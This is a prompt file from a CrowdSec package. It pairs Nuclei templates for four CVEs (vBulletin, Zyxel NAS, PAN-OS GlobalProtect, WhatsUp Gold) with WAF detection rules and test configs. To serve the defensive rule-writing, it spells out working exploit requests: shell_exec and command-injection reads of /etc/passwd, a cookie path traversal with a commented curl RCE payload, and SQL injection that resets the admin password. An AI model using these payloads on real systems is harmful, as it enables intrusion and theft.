crowdsec-local-mcp 0.1.0__py3-none-any.whl

crowdsec_local_mcp/prompts/prompt-waf-examples.txt

@@ -0,0 +1,401 @@
+### 1 - Example Input (Nuclei Template):
+```yaml
+id: CVE-2020-17496
+
+info:
+  name: vBulletin 5.5.4 - 5.6.2- Remote Command Execution
+  author: pussycat0x
+  severity: critical
+  description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.'
+
+http:
+  - raw:
+      - |
+        POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+```
+
+### Example Output (Detection Rule):
+===RULE===
+name: crowdsecurity/vpatch-CVE-2020-17496
+description: 'vBulletin RCE (CVE-2020-17496)'
+rules:
+  - and:
+    - zones:
+      - URI
+      transform:
+      - lowercase
+      match:
+        type: endsWith
+        value: /ajax/render/widget_tabbedcontainer_tab_panel
+    - zones:
+      - BODY_ARGS
+      variables:
+      - /subwidgets\[[0-9]+\]\[template\]/
+      match:
+        type: equals
+        value: widget_php
+    - zones:
+      - BODY_ARGS_NAMES
+      match:
+        type: regex
+        value: subWidgets\[[0-9]+\]\[config\]\[code\]
+
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: 'http:exploit'
+  label: 'vBulletin - RCE'
+  classification:
+   - cve.CVE-2020-17496
+   - attack.T1595
+   - attack.T1190
+   - cwe.CWE-74
+
+===TEST_CONFIG====
+appsec-rules:
+- ./appsec-rules/crowdsecurity/base-config.yaml
+- ./appsec-rules/crowdsecurity/vpatch-CVE-2020-17496.yaml
+nuclei_template: CVE-2020-17496.yaml
+
+===TEST_NUCLEI====
+id: CVE-2020-17496
+info:
+  name: CVE-2020-17496
+  author: crowdsec
+  severity: info
+  description: CVE-2020-17496 testing
+  tags: appsec-testing
+http:
+  - raw:
+      - |
+        POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;
+
+    cookie-reuse: true
+    #test will fail because we won't match http status
+    matchers:
+    - type: status
+      status:
+       - 403
+
+
+### 2 - Example Input (Nuclei Template):
+```yaml
+id: CVE-2020-9054
+
+info:
+  name: Zyxel NAS Firmware 5.21- Remote Code Execution
+  description: 'Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability.'
+  classification:
+    cvss-score: 9.8
+    cve-id: CVE-2020-9054
+    cwe-id: CWE-78
+  tags: cve2020,cve,rce,zyxel,injection,kev
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+# digest: 490a00463044022043cae3ef335cbb2f8c7c8501b6c55a84c61f07feb27f26bb32429e52e8a2a2fa02203c126dbc246c5d52e30849054d666a5f58c164092064ac5a42d35936e313562b:922c64590222798bb761d5b6d8e72950
+```
+
+### Example Output (Detection Rule):
+===RULE===
+name: crowdsecurity/vpatch-CVE-2020-9054
+description: 'Detects pre-authentication command injection in Zyxel NAS devices via weblogin.cgi'
+rules:
+  - and:
+      - zones:
+          - URI
+        transform:
+          - lowercase
+        match:
+          type: contains
+          value: /cgi-bin/weblogin.cgi
+      - zones:
+          - ARGS
+        variables:
+          - username
+        transform:
+          - lowercase
+        match:
+          type: contains
+          value: "'"
+
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: 'http:exploit'
+  label: 'Zyxel NAS - RCE'
+  classification:
+    - cve.CVE-2020-9054
+    - attack.T1190
+    - cwe.CWE-78
+
+
+===TEST_CONFIG====
+appsec-rules:
+  - ./appsec-rules/crowdsecurity/base-config.yaml
+  - ./appsec-rules/crowdsecurity/vpatch-CVE-2020-9054.yaml
+nuclei_template: CVE-2020-9054.yaml
+
+===TEST_NUCLEI====
+id: CVE-2020-9054
+info:
+  name: CVE-2020-9054
+  author: crowdsec
+  severity: info
+  description: CVE-2020-9054 testing
+  tags: appsec-testing
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd"
+    cookie-reuse: true
+    matchers:
+    - type: status
+      status:
+       - 403
+
+
+
+### 3 - Example Input (Nuclei Template):
+```yaml
+id: CVE-2024-3400
+
+info:
+  name: GlobalProtect - OS Command Injection
+  author: salts,parthmalhotra
+  severity: critical
+  description: |
+    A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
+
+http:
+  - raw:
+      - |
+        GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST /ssl-vpn/hipreport.esp HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt;
+        Content-Type: application/x-www-form-urlencoded
+
+        user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global
+      - |
+        GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1
+        Host: {{Hostname}}
+
+      # Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}{{interactsh-url}}`; payload for rce, requires cronjob to be executed to run command
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code_1 == 404 && status_code_3 == 403
+          - contains(body_2, 'invalid required input parameters')
+        condition: and
+# digest: 4a0a00473045022008b369ceac1f6e7ed59d42e2370c7ad327a6867980958a81925d5d25122b3f090221009987bd7cdcc2964e527754acdbbd8fbdc3555c53445648c5eb77102ebd08cde7:922c64590222798bb761d5b6d8e72950
+```
+
+### Example Output (Detection Rule):
+===RULE===
+name: crowdsecurity/vpatch-CVE-2024-3400
+description: 'Detects OS command injection in GlobalProtect feature of Palo Alto Networks PAN-OS'
+rules:
+  - and:
+      - zones:
+          - URI
+        transform:
+          - lowercase
+        match:
+          type: contains
+          value: /ssl-vpn/hipreport.esp
+      - zones:
+          - HEADERS
+        variables:
+          - Cookie
+        transform:
+          - lowercase
+        match:
+          type: contains
+          value: sessid=/../../
+
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: 'http:exploit'
+  label: 'GlobalProtect - RCE'
+  classification:
+    - cve.CVE-2024-3400
+    - attack.T1190
+    - cwe.CWE-20
+    - cwe.CWE-77
+
+===TEST_CONFIG====
+appsec-rules:
+  - ./appsec-rules/crowdsecurity/base-config.yaml
+  - ./appsec-rules/crowdsecurity/vpatch-CVE-2024-3400.yaml
+nuclei_template: CVE-2024-3400.yaml
+
+===TEST_NUCLEI====
+id: CVE-2024-3400
+info:
+  name: CVE-2024-3400
+  author: crowdsec
+  severity: info
+  description: CVE-2024-3400 testing
+  tags: appsec-testing
+http:
+  - raw:
+      - |
+        POST /ssl-vpn/hipreport.esp HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt;
+        Content-Type: application/x-www-form-urlencoded
+
+        user=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global
+    cookie-reuse: true
+    matchers:
+    - type: status
+      status:
+       - 403
+
+
+### 4 - Example Input (Nuclei Template):
+```yaml
+id: CVE-2024-6670
+
+info:
+  name: WhatsUp Gold HasErrors SQL Injection - Authentication Bypass
+  author: DhiyaneshDK,princechaddha
+  severity: critical
+  description: |
+    In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.
+
+variables:
+  username: "admin"
+  password: "{{to_lower(rand_text_alpha(8))}}"
+
+http:
+  - raw:
+      - |
+        POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 302
+          - contains(set_cookie, 'ASP.NET_SessionId=')
+        condition: and
+        internal: true
+
+  - raw:
+      - |
+        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code == 200
+        condition: and
+        internal: true
+```
+
+### Example Output (Detection Rule):
+===RULE===
+name: crowdsecurity/vpatch-CVE-2024-6670
+description: 'WhatsUp Gold HasErrors SQL Injection - Authentication Bypass'
+rules:
+  - and:
+      - zones:
+          - URI
+        transform:
+          - lowercase
+        match:
+          type: contains
+          value: /nmconsole/platform/performancemonitorerrors/haserrors
+      - zones:
+          - BODY_ARGS
+        variables:
+          - json.classId
+        transform:
+          - lowercase
+          - urldecode
+        match:
+          type: contains
+          value: "'"
+
+labels:
+  type: exploit
+  service: http
+  confidence: 3
+  spoofable: 0
+  behavior: 'http:exploit'
+  label: 'WhatsUp Gold - Authentication Bypass'
+  classification:
+    - cve.CVE-2024-6670
+    - attack.T1190
+    - cwe.CWE-20
+    - cwe.CWE-77
+
+===TEST_CONFIG====
+appsec-rules:
+  - ./appsec-rules/crowdsecurity/base-config.yaml
+  - ./appsec-rules/crowdsecurity/vpatch-CVE-2024-6670.yaml
+nuclei_template: CVE-2024-6670.yaml
+
+===TEST_NUCLEI====
+id: CVE-2024-6670
+info:
+  name: CVE-2024-6670
+  author: crowdsec
+  severity: info
+  description: CVE-2024-6670 testing
+  tags: appsec-testing
+http:
+  - raw:
+      - |
+        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}
+    cookie-reuse: true
+    matchers:
+    - type: status
+      status:
+       - 403